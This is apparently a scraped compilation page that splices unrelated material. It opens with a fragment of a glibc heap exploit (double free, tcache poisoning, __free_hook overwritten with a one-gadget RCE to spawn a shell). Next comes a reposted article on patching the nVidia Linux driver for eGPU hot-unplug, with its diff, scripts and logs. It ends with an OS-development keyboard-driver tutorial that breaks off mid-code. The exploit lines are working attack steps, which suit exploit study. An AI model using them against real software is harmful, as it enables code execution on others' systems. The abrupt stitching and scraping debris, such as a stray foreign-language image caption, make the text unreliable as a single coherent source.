# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)

References

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quire reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.Картинки по запросу nvidiaThere’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceeded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars, passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modesetmodule. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

Here’s some handy scripts I was using while debugging it:

insmod.sh
1
2
3
4
5
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod.sh
1
2
3
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
xorg.sh
1
2
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
Xorg.8.log
1
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

Let’s write a Kernel with keyboard and screen support

origin text

Today, we will extend that kernel to include keyboard driver that can read the characters a-z and 0-9 from the keyboard and print them on screen.

Source code used for this article is available at Github repository — mkeykernel

We communicate with I/O devices using I/O ports. These ports are just specific address on the x86’s I/O bus, nothing more. The read/write operations from these ports are accomplished using specific instructions built into the processor.

 

Reading from and Writing to ports

read_port:
	mov edx, [esp + 4]
	in al, dx	
	ret

write_port:
	mov   edx, [esp + 4]    
	mov   al, [esp + 4 + 4]  
	out   dx, al  
	ret

I/O ports are accessed using the in and out instructions that are part of the x86 instruction set.

In read_port, the port number is taken as argument. When compiler calls your function, it pushes all its arguments onto the stack. The argument is copied to the register edx using the stack pointer. The register dx is the lower 16 bits of edx. The in instruction here reads the port whose number is given by dx and puts the result in al. Register al is the lower 8 bits of eax. If you remember your college lessons, function return values are received through the eax register. Thus read_port lets us read I/O ports.

write_port is very similar. Here we take 2 arguments: port number and the data to be written. The out instruction writes the data to the port.

 

Interrupts

Now, before we go ahead with writing any device driver; we need to understand how the processor gets to know that the device has performed an event.

The easiest solution is polling — to keep checking the status of the device forever. This, for obvious reasons is not efficient and practical. This is where interrupts come into the picture. An interrupt is a signal sent to the processor by the hardware or software indicating an event. With interrupts, we can avoid polling and act only when the specific interrupt we are interested in is triggered.

A device or a chip called Programmable Interrupt Controller (PIC) is responsible for x86 being an interrupt driven architecture. It manages hardware interrupts and sends them to the appropriate system interrupt.

When certain actions are performed on a hardware device, it sends a pulse called Interrupt Request (IRQ) along its specific interrupt line to the PIC chip. The PIC then translates the received IRQ into a system interrupt, and sends a message to interrupt the CPU from whatever it is doing. It is then the kernel’s job to handle these interrupts.

Without a PIC, we would have to poll all the devices in the system to see if an event has occurred in any of them.

Let’s take the case of a keyboard. The keyboard works through the I/O ports 0x60 and 0x64. Port 0x60 gives the data (pressed key) and port 0x64 gives the status. However, you have to know exactly when to read these ports.

Interrupts come quite handy here. When a key is pressed, the keyboard gives a signal to the PIC along its interrupt line IRQ1. The PIC has an offset value stored during initialization of the PIC. It adds the input line number to this offset to form the Interrupt number. Then the processor looks up a certain data structure called the Interrupt Descriptor Table (IDT) to give the interrupt handler address corresponding to the interrupt number.

Code at this address is then run, which handles the event.

Setting up the IDT

struct IDT_entry{
	unsigned short int offset_lowerbits;
	unsigned short int selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short int offset_higherbits;
};

struct IDT_entry IDT[IDT_SIZE];

void idt_init(void)
{
	unsigned long keyboard_address;
	unsigned long idt_address;
	unsigned long idt_ptr[2];

	/* populate IDT entry of keyboard's interrupt */
	keyboard_address = (unsigned long)keyboard_handler; 
	IDT[0x21].offset_lowerbits = keyboard_address & 0xffff;
	IDT[0x21].selector = 0x08; /* KERNEL_CODE_SEGMENT_OFFSET */
	IDT[0x21].zero = 0;
	IDT[0x21].type_attr = 0x8e; /* INTERRUPT_GATE */
	IDT[0x21].offset_higherbits = (keyboard_address & 0xffff0000) >> 16;
	

	/*     Ports
	*	 PIC1	PIC2
	*Command 0x20	0xA0
	*Data	 0x21	0xA1
	*/

	/* ICW1 - begin initialization */
	write_port(0x20 , 0x11);
	write_port(0xA0 , 0x11);

	/* ICW2 - remap offset address of IDT */
	/*
	* In x86 protected mode, we have to remap the PICs beyond 0x20 because
	* Intel have designated the first 32 interrupts as "reserved" for cpu exceptions
	*/
	write_port(0x21 , 0x20);
	write_port(0xA1 , 0x28);

	/* ICW3 - setup cascading */
	write_port(0x21 , 0x00);  
	write_port(0xA1 , 0x00);  

	/* ICW4 - environment info */
	write_port(0x21 , 0x01);
	write_port(0xA1 , 0x01);
	/* Initialization finished */

	/* mask interrupts */
	write_port(0x21 , 0xff);
	write_port(0xA1 , 0xff);

	/* fill the IDT descriptor */
	idt_address = (unsigned long)IDT ;
	idt_ptr[0] = (sizeof (struct IDT_entry) * IDT_SIZE) + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16 ;

	load_idt(idt_ptr);
}

We implement IDT as an array comprising structures IDT_entry. We’ll discuss how the keyboard interrupt is mapped to its handler later in the article. First, let’s see how the PICs work.

Modern x86 systems have 2 PIC chips each having 8 input lines. Let’s call them PIC1 and PIC2. PIC1 receives IRQ0 to IRQ7 and PIC2 receives IRQ8 to IRQ15. PIC1 uses port 0x20 for Command and 0x21 for Data. PIC2 uses port 0xA0 for Command and 0xA1 for Data.

The PICs are initialized using 8-bit command words known as Initialization command words (ICW). See this link for the exact bit-by-bit syntax of these commands.

In protected mode, the first command you will need to give the two PICs is the initialize command ICW1 (0x11). This command makes the PIC wait for 3 more initialization words on the data port.

These commands tell the PICs about:

* Its vector offset. (ICW2)
* How the PICs wired as master/slaves. (ICW3)
* Gives additional information about the environment. (ICW4)

The second initialization command is the ICW2, written to the data ports of each PIC. It sets the PIC’s offset value. This is the value to which we add the input line number to form the Interrupt number.

PICs allow cascading of their outputs to inputs between each other. This is setup using ICW3 and each bit represents cascading status for the corresponding IRQ. For now, we won’t use cascading and set all to zeroes.

ICW4 sets the additional enviromental parameters. We will just set the lower most bit to tell the PICs we are running in the 80×86 mode.

Tang ta dang !! PICs are now initialized.

 

Each PIC has an internal 8 bit register named Interrupt Mask Register (IMR). This register stores a bitmap of the IRQ lines going into the PIC. When a bit is set, the PIC ignores the request. This means we can enable and disable the nth IRQ line by making the value of the nth bit in the IMR as 0 and 1 respectively. Reading from the data port returns value in the IMR register, and writing to it sets the register. Here in our code, after initializing the PICs; we set all bits to 1 thereby disabling all IRQ lines. We will later enable the line corresponding to keyboard interrupt. As of now, let’s disable all the interrupts !!

Now if IRQ lines are enabled, our PICs can receive signals via IRQ lines and convert them to interrupt number by adding with the offset. Now, we need to populate the IDT such that the interrupt number for the keyboard is mapped to the address of the keyboard handler function we will write.

Which interrupt number should the keyboard handler address be mapped against in the IDT?

The keyboard uses IRQ1. This is the input line 1 of PIC1. We have initialized PIC1 to an offset 0x20 (see ICW2). To find interrupt number, add 1 + 0x20 ie. 0x21. So, keyboard handler address has to be mapped against interrupt 0x21 in the IDT.

So, the next task is to populate the IDT for the interrupt 0x21.
We will map this interrupt to a function keyboard_handler which we will write in our assembly file.

Each IDT entry consist of 64 bits. In the IDT entry for the interrupt, we do not store the entire address of the handler function together. We split it into 2 parts of 16 bits. The lower bits are stored in the first 16 bits of the IDT entry and the higher 16 bits are stored in the last 16 bits of the IDT entry. This is done to maintain compatibility with the 286. You can see Intel pulls shrewd kludges like these in so many places !!

In the IDT entry, we also have to set the type — that this is done to trap an interrupt. We also need to give the kernel code segment offset. GRUB bootloader sets up a GDT for us. Each GDT entry is 8 bytes long, and the kernel code descriptor is the second segment; so its offset is 0x08 (More on this would be too much for this article). Interrupt gate is represented by 0x8e. The remaining 8 bits in the middle has to be filled with all zeroes. In this way, we have filled the IDT entry corresponding to the keyboard’s interrupt.

Once the required mappings are done in the IDT, we got to tell the CPU where the IDT is located.
This is done via the lidt assembly instruction. lidt take one operand. The operand must be a pointer to a descriptor structure that describes the IDT.

The descriptor is quite straight forward. It contains the size of IDT in bytes and its address. I have used an array to pack the values. You may also populate it using a struct.

We have the pointer in the variable idt_ptr and then pass it on to lidt using the function load_idt().

load_idt:
	mov edx, [esp + 4]
	lidt [edx]
	sti
	ret

Additionally, load_idt() function turns the interrupts on using sti instruction.

Once the IDT is set up and loaded, we can turn on keyboard’s IRQ line using the interrupt mask we discussed earlier.

void kb_init(void)
{
	/* 0xFD is 11111101 - enables only IRQ1 (keyboard)*/
	write_port(0x21 , 0xFD);
}

 

Keyboard interrupt handling function

Well, now we have successfully mapped keyboard interrupts to the function keyboard_handler via IDT entry for interrupt 0x21.
So, everytime you press a key on your keyboard you can be sure this function is called.

keyboard_handler:                 
	call    keyboard_handler_main
	iretd

This function just calls another function written in C and returns using the iret class of instructions. We could have written our entire interrupt handling process here, however it’s much easier to write code in C than in assembly — so we take it there.
iret/iretd should be used instead of ret when returning control from an interrupt handler to a program that was interrupted by an interrupt. These class of instructions pop the flags register that was pushed into the stack when the interrupt call was made.

void keyboard_handler_main(void) {
	unsigned char status;
	char keycode;

	/* write EOI */
	write_port(0x20, 0x20);

	status = read_port(KEYBOARD_STATUS_PORT);
